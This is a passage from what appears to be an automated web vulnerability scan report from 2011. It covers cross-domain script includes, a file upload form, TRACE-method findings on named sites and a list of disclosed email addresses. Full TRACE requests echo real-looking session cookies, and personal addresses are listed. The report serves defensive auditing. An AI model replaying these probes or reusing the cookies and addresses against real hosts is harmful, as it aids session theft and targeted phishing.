Host:	https://www.sslmatrix.com
Path:	/Order/quickorder

Issue detail

The response dynamically includes the following script from another domain:

https://smarticon.geotrust.com/si.js

Request

Response

18.304. https://www.sslmatrix.com/ssl-promotion-code previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/ssl-promotion-code

Issue detail

The response dynamically includes the following script from another domain:

https://smarticon.geotrust.com/si.js

Request

Response

18.305. https://www.sslmatrix.com/ssl-promotion-code/ssl-price previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/ssl-promotion-code/ssl-price

Issue detail

The response dynamically includes the following script from another domain:

https://smarticon.geotrust.com/si.js

Request

Response

18.306. http://www.vasco.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vasco.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.vasco.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 21:24:46 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 18866

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

18.307. http://www.vasco.com/images/css/readmore_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vasco.com
Path:	/images/css/readmore_bg.gif

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /images/css/readmore_bg.gif HTTP/1.1
Host: www.vasco.com
Proxy-Connection: keep-alive
Referer: http://www.vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 21:24:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 19499

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4c99effd765dd67e"></script>
...[SNIP]...

19. File upload functionality previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1314991730/build/system/upload.html

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://mediacdn.disqus.com/1314991730/build/system/upload.html

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

Request

GET /1314991730/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 02 Sep 2011 19:38:34 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 13745
X-Varnish: 1593835189 1593832365
Cache-Control: max-age=2528769
Expires: Sun, 02 Oct 2011 19:41:23 GMT
Date: Sat, 03 Sep 2011 13:15:14 GMT
Connection: close

<html>
<head>
<meta charset="utf-8">
<title></title>
<script>document.domain = 'disqus.com';</script>

<style type="text/css">
html,body,div,span,applet,object,ifram
...[SNIP]...

<input type="file" name="attachment" onchange="mediaUploadRpc.onUploadStart();this.parentNode.submit();" />
<input type="hidden" name="id" value="" />
...[SNIP]...

20. TRACE method is enabled previous next
There are 7 instances of this issue:

http://bh.contextweb.com/
http://content.etilize.com/
http://image2.pubmatic.com/
http://login.dotomi.com/
http://pixel.rubiconproject.com/
http://www.register.com/
http://www.shrinktheweb.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

20.1. http://bh.contextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 15864ed907d48ceb

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Content-Type: message/http
Content-Length: 243
Date: Sat, 03 Sep 2011 21:33:49 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 15864ed907d48ceb; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5
connection: Keep-Alive
cw-userhostaddress: 50.23.123.106

20.2. http://content.etilize.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.etilize.com
Path:	/

Request

TRACE / HTTP/1.0
Host: content.etilize.com
Cookie: b5ceac0f6360b697

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:34:14 GMT
Server: PWS/1.7.3.3
X-Px: nc h0-s1003.p10-sjc ( origin>CONN)
Content-Length: 349
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: content.etilize.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 h0-s1003.p10-sjc.cdngp.net PWS/1.7.3.3
X-Forwarded-For: 50.23.123.106, 174.35.40.3
X-Forwarded-IP: 50.23.123.106
X-Initial-Url: http://content.etilize.com/
Cookie: b5ceac0f6360b697
Connection: keep-alive

20.3. http://image2.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 46c5ea1d7db17e9c

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:23:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 46c5ea1d7db17e9c; KRTBCOOKIE_57=476-uid:6422714091563403120; PUBRETARGET=78_1409703834

20.4. http://login.dotomi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/

Request

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: c02e76d935c0630a

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: c02e76d935c0630a; Apache=50.23.123.106.1315085356079353; DotomiUser=230900890276886667$0$2054424934; rt_1982=2; le_7931=7; DotomiRR2304=-1$4$1$-1$1$1$; DotomiSession_2304=2_270600892638176047$230900890276886667$205442
...[SNIP]...

20.5. http://pixel.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 71b862d2b5a92e26

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:32:24 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 71b862d2b5a92e26; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C2%2C%2C; rpb=7908%3D1%264940%3D1; put_1994=vf1kj11kp2en
Connection: Keep-Alive
X-Forwarded-For: 50.23.123.106

20.6. http://www.register.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.register.com
Cookie: 33ff912bc6fcbebf

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:31:34 GMT
HostName: atleuapp02.galt.register.com
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.register.com
Cookie: 33ff912bc6fcbebf; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&;
...[SNIP]...

20.7. http://www.shrinktheweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shrinktheweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.shrinktheweb.com
Cookie: 63ab44dd9ac0b511

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:33:15 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.shrinktheweb.com
Cookie: 63ab44dd9ac0b511

21. Email addresses disclosed previous next
There are 124 instances of this issue:

http://a1848.g.akamai.net/7/1848/13927/v001/godaddysof1.download.akamai.com/13755/GDAffiliate_ACH_640x360_large.flv
http://api.twitter.com/1/statuses/user_timeline/msnewengland.json
https://cart.godaddy.com/basket.aspx
http://diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js
http://diginotar.nl/Portals/_default/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js
http://diginotar.nl/controls/SolpartMenu/spmenu.js
http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/retrieveaccount.aspx
http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/363c/maps2/%7Bmain,mod_util,mod_act,mod_act_s,mod_actbr,mod_adf,mod_appiw,mod_mg,mod_mssvt,mod_rst,mod_strr%7D.js
http://microsoftcambridge.com/Events/tabid/57/Default.aspx
http://microsoftcambridge.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js
http://microsoftcambridge.com/Resources/Shared/scripts/widgets.js
http://microsoftcambridge.com/controls/SolpartMenu/spmenu.js
http://research.microsoft.com/en-us/about/contactus.aspx
http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx
http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx
http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx
http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx
http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx
http://research.microsoft.com/en-us/events/escience2011/
http://research.microsoft.com/en-us/jobs/intern/cmic.aspx
http://research.microsoft.com/en-us/labs/cmic/default.aspx
http://research.microsoft.com/en-us/labs/ilabs/default.aspx
http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx
http://research.microsoft.com/en-us/news/features/hoare-080411.aspx
http://research.microsoft.com/en-us/news/features/interns-080309.aspx
http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx
http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx
http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx
http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx
http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx
http://research.microsoft.com/en-us/people/bycook/default.aspx
http://research.microsoft.com/en-us/people/gray/
http://research.microsoft.com/en-us/people/gray/default.aspx
http://research.microsoft.com/en-us/people/larus/default.aspx
http://research.microsoft.com/en-us/people/liuj/default.aspx
http://research.microsoft.com/en-us/people/padmanab/default.aspx
http://research.microsoft.com/en-us/people/palarson/default.aspx
http://research.microsoft.com/en-us/people/philbe/
http://research.microsoft.com/en-us/people/philbe/default.aspx
http://research.microsoft.com/en-us/people/ramjee/
http://research.microsoft.com/en-us/people/ranveer/default.aspx
http://research.microsoft.com/en-us/people/richdr/default.aspx
http://research.microsoft.com/en-us/people/simonpj/
http://research.microsoft.com/en-us/people/simonpj/default.aspx
http://research.microsoft.com/en-us/people/thekkath/default.aspx
http://research.microsoft.com/en-us/press/default.aspx
http://research.microsoft.com/en-us/projects/wwt/contest.aspx
http://research.microsoft.com/en-us/um/people/abegel/starlogo/starlogo-kybernetes-paper.doc
http://research.microsoft.com/en-us/um/people/bahl/
http://research.microsoft.com/en-us/um/people/blampson/
http://research.microsoft.com/en-us/um/people/borgs/
http://research.microsoft.com/en-us/um/people/heckerman/
http://research.microsoft.com/en-us/um/people/hjzhang/
http://research.microsoft.com/en-us/um/people/horvitz/
http://research.microsoft.com/en-us/um/people/jchayes/
http://research.microsoft.com/en-us/um/people/jgrudin/
http://research.microsoft.com/en-us/um/people/sdumais/
http://research.microsoft.com/en-us/um/people/ssaponas/
http://research.microsoft.com/en-us/um/people/szeliski/
http://research.microsoft.com/en-us/um/people/zhang/
http://research.microsoft.com/en-us/um/redmond/groups/ivm/ICE/
http://research.microsoft.com/en-us/um/redmond/groups/ivm/hdview/
http://research.microsoft.com/en-us/um/redmond/projects/songsmith/
http://scripts.omniture.com/javascript.js
http://shop.vasco.com/error_500.aspx
https://shop.vasco.com/legal.aspx
https://shop.vasco.com/privacy_statement.aspx
https://shop.vasco.com/terms_and_conditions.aspx
http://static.tumblr.com/fftf9xi/GXWlp9jjo/core.css
https://support.microsoft.com/contactus/emailcontact.aspx
http://twitter.com/account/bootstrap_data
http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
http://vasco.com/js/rotating_banner.js
http://vasco.com/user_registration.aspx
http://w.sharethis.com/button/buttons.js
http://www.digicert.com/
http://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js
http://www.diginotar.com/Products/ExtendedValidationSSL/tabid/622/Default.aspx
http://www.diginotar.com/Products/Identity/CertiIDManagedPKI/tabid/2246/Default.aspx
http://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js
http://www.diginotar.com/Resources/Shared/scripts/widgets.js
http://www.diginotar.com/controls/SolpartMenu/spmenu.js
http://www.diginotar.com/portals/0/PrivacyStatement.pdf
https://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js
https://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js
https://www.diginotar.com/Resources/Shared/scripts/widgets.js
https://www.diginotar.com/controls/SolpartMenu/spmenu.js
http://www.diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js
http://www.diginotar.nl/controls/SolpartMenu/spmenu.js
http://www.dnncreative.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js
http://www.dnncreative.com/Resources/Shared/scripts/widgets.js
http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx
http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx
http://www.godaddy.com/Payment/payment-options.aspx
http://www.godaddy.com/affiliates/affiliate-program.aspx
http://www.godaddy.com/gdshop/offers/cross_sell.asp
http://www.godaddy.com/ssl/ssl-certificates.aspx
http://www.hostnj.net/
http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
http://www.hostnj.net/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js
http://www.microsoft-careers.com/find.job
http://www.microsoft-careers.com/job/Cambridge-Database-Administrator-TV-2FVideo-Advertising-Job-MA-02138/1394190/
http://www.microsoft-careers.com/job/Cambridge-Product-Planner,-Lead-APS-754562-Job-MA-02138/1248350/
http://www.microsoft-careers.com/job/Cambridge-Program-Manager-Interactive-Entertainment-Business-Job-MA-02138/1186137/
http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/
http://www.microsoft-careers.com/job/Cambridge-Software-Development-Engineer-in-Test-II-Office-365-Job-MA-02138/1289133/
http://www.microsoft-careers.com/job/Cambridge-Software-Test-Engineer-28SDET-29-II-Job-MA-02138/1383264/
http://www.microsoft-careers.com/job/Cambridge-System-Engineer-TV-2FVideo-Advertising-Job-MA-02138/1394205/
http://www.microsoft-careers.com/search
https://www.microsoft-careers.com/
https://www.microsoft-careers.com/content/corporate-research/
https://www.microsoft-careers.com/find.job
https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/
https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/
https://www.microsoft-careers.com/talentcommunity/subscribe/
http://www.register.com/js/domain-taken.js
http://www.register.com/js/jquery.cookie.js
https://www.sslmatrix.com/script/jquery.hoverIntent.js
https://www.sslmatrix.com/script/jquery.jqGrid.min.js
https://www.sslmatrix.com/script/jquery_menu.js
http://www.vasco.com/js/rotating_banner.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

21.1. http://a1848.g.akamai.net/7/1848/13927/v001/godaddysof1.download.akamai.com/13755/GDAffiliate_ACH_640x360_large.flv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1848.g.akamai.net
Path:	/7/1848/13927/v001/godaddysof1.download.akamai.com/13755/GDAffiliate_ACH_640x360_large.flv

Issue detail

The following email address was disclosed in the response:

e@hv.Cy

Request

GET /7/1848/13927/v001/godaddysof1.download.akamai.com/13755/GDAffiliate_ACH_640x360_large.flv HTTP/1.1
Host: a1848.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://img1.wsimg.com/gdtv/swf/apiplayeras2_2.swf?mediaID=AffiliatesProductOverview&myXML=%3Cvideo%3E%3Cinfo%20vTitle%3D%22%22%20vURL%3D%22http%3A//a1848.g.akamai.net/7/1848/13927/v001/godaddysof1.download.akamai.com/13755/GDAffiliate_ACH_640x360_large.flv%22%20vClick%3D%22AffiliatesProductOverview%22%3EInfo%3C/info%3E%3C/video%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "922c26cf67537cecf9752dc97c051dbe:1298053385"
Last-Modified: Fri, 18 Feb 2011 18:23:04 GMT
Accept-Ranges: bytes
Content-Length: 8807040
Content-Type: video/x-flv
Date: Sun, 04 Sep 2011 00:26:24 GMT
Connection: close

FLV..... .................
onMetaData....
..duration.@QB=p..
..width.@.........height.@z.......videodatarate.@........ framerate.@=.Q......videocodecid.@........audiodatarate.@`.......
audiodelay.?.
...[SNIP]...
.d.1.*.....h.8a.@B...'.`{5....^.....z.......(..0.8^I..8..+]t...]....f.NF..
|..o..a.f...f..(/uD...Z.B...p.....Pt...+..^....O.Nb......6...V.....H......3.JfU..n.}t.9%...../C....X....PY^..8.d.\.zK...f....e@hv.Cy......t)....|2M.Ws.,>
...[SNIP]...

21.2. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline/msnewengland.json

Issue detail

The following email address was disclosed in the response:

nerdconf@microsoft.com

Request

Response

21.3. https://cart.godaddy.com/basket.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cart.godaddy.com
Path:	/basket.aspx

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com

Request

Response

21.4. http://diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://diginotar.nl
Path:	/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js HTTP/1.1
Host: diginotar.nl
Proxy-Connection: keep-alive
Referer: http://diginotar.nl/Aanvragen/Lopendeprojecten/DVS/tabid/331/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=GkxP6RGhzAEkAAAANjA0ZTQzNjItYThjYi00YzIyLThkNmItYmE0MzhkMWNhYjI00; __utma=73892103.1325282259.1315085212.1315085212.1315085212.1; __utmb=73892103.1.10.1315085212; __utmc=73892103; __utmz=73892103.1315085212.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); language=nl-NL

Response

HTTP/1.1 200 OK
Content-Length: 2636
Content-Type: application/x-javascript
Last-Modified: Mon, 31 Aug 2009 12:57:44 GMT
Accept-Ranges: bytes
ETag: "01488a13a2aca1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:26:46 GMT

/* =========================================================

// jquery.innerfade.js

// Datum: 2007-01-29
// Firma: Medienfreunde Hofmann & Baldes GbR
// Autor: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/

// ========================================================= */

(function(
...[SNIP]...

21.5. http://diginotar.nl/Portals/_default/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://diginotar.nl
Path:	/Portals/_default/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js

Issue detail

The following email address was disclosed in the response:

t.baldes@medienfreunde.com

Request

GET /Portals/_default/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js HTTP/1.1
Host: diginotar.nl
Proxy-Connection: keep-alive
Referer: http://diginotar.nl/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=GkxP6RGhzAEkAAAANjA0ZTQzNjItYThjYi00YzIyLThkNmItYmE0MzhkMWNhYjI00; language=nl-NL

Response

HTTP/1.1 200 OK
Content-Length: 2636
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Feb 2010 10:20:38 GMT
Accept-Ranges: bytes
ETag: "01fd03228a3ca1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:26:07 GMT

/* =========================================================

// jquery.innerfade.js

// Datum: 2007-01-29
// Firma: Medienfreunde Hofmann & Baldes GbR
// Autor: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/

// ========================================================= */

(function(
...[SNIP]...

21.6. http://diginotar.nl/controls/SolpartMenu/spmenu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://diginotar.nl
Path:	/controls/SolpartMenu/spmenu.js

Issue detail

The following email address was disclosed in the response:

jhenning@solpart.com

Request

GET /controls/SolpartMenu/spmenu.js HTTP/1.1
Host: diginotar.nl
Proxy-Connection: keep-alive
Referer: http://diginotar.nl/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=GkxP6RGhzAEkAAAANjA0ZTQzNjItYThjYi00YzIyLThkNmItYmE0MzhkMWNhYjI00; language=nl-NL

Response

HTTP/1.1 200 OK
Content-Length: 67819
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 05:53:52 GMT
Accept-Ranges: bytes
ETag: "018cc458e29cc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:26:03 GMT

//------------------------------------------------------//
// Solution Partner's ASP.NET Hierarchical Menu Control //
// Copyright (c) 2002-2005 //
// Jon Henning - Solution Partner's Inc //
// jhenning@solpart.com - http://www.solpart.com //
// Compatible Menu Version: <Min: 1400>
...[SNIP]...
tion spm_stopEventBubbling(e)
{
if (spm_browserType() == 'ie')
           window.event.cancelBubble = true;
       else
           e.stopPropagation();
}

//--- if you have a better solution send me an email - jhenning@solpart.com ---//
function spm_appendFunction(from_func, to_func)
{
if (from_func == null)
return new Function ( to_func );
return new Function ( spm_parseFunctionContents(from_func) + '\n' + spm_pa
...[SNIP]...

21.7. http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://frankgruber.me
Path:	/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

Issue detail

The following email address was disclosed in the response:

nova@stylehatch.co

Request

Response

21.8. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com

Request

Response

21.9. https://idp.godaddy.com/retrieveaccount.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/retrieveaccount.aspx

Issue detail

The following email addresses were disclosed in the response:

YourEmail@YourWebsite.com
marketing@godaddy.com
sitesuggestions@godaddy.com

Request

Response

21.10. http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img3.wsimg.com
